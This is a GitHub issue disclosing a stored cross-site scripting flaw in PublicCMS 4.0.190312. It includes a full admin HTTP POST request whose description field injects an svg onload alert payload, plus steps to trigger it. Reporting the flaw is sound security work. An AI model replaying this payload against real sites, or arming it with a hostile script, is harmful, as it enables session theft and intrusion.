### ISSUE TITLE
There is a xss via /publiccms/admin/cmsCategoryType/save.do

### ISSUE THREAD

**Issue by Invi0sible** [sanluan/PublicCMS#25]
Hello,I found a xss in the version of PublicCMS-4.0.190312
1.Add category type
![image](https://user-images.githubusercontent.com/33925178/64509625-b15c5080-d312-11e9-9376-ac2109373936.png)
POST /publiccms/admin/cmsCategoryType/save.do?callbackType=closeCurrent&navTabId=cmsCategoryType/list HTTP/1.1
Host: 10.211.55.8:9999
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 499
Connection: close
Referer: http://10.211.55.8:9999/publiccms/admin/
Cookie: JSESSIONID=E5E9BE2169830DBF8DD9D76A600E682A; PUBLICCMS_ADMIN=1_a4652846-7dba-43b6-9b00-588d24009661; Hm_lvt_12fc28a048b3367aa46f20380b6678ff=1566047983; lang=gb; __atuvc=2%7C34; cms.locale=zh

id=2&_csrf=a4652846-7dba-43b6-9b00-588d24009661&name=xxs_test&sort=0&dwz_rowNum=1&categoryExtends%5B0%5D.id.extendId=2&categoryExtends%5B0%5D.id.code=gdb&categoryExtends%5B0%5D.inputType=file&categoryExtends%5B0%5D.name=xxs_test&categoryExtends%5B0%5D.defaultValue=&categoryExtends%5B0%5D.maxlength=&categoryExtends%5B0%5D.dictionaryId=&categoryExtends%5B0%5D.dictionaryName=&categoryExtends%5B0%5D.description=**'"/></textarea><svg onload=alert('one')>**&categoryExtends%5B0%5D.sort=0
![image](https://user-images.githubusercontent.com/33925178/64509795-14e67e00-d313-11e9-83f0-057594f92615.png)
![image](https://user-images.githubusercontent.com/33925178/64509884-4e1eee00-d313-11e9-93c7-780e46692c80.png)

2.And then click the above button trigger xss
![image](https://user-images.githubusercontent.com/33925178/64510074-cdacbd00-d313-11e9-97c5-237bec8a7cc3.png)
![image](https://user-images.githubusercontent.com/33925178/64510090-da311580-d313-11e9-813d-8d9a39640309.png)

**Comment by muguaofyu** [comment]
6
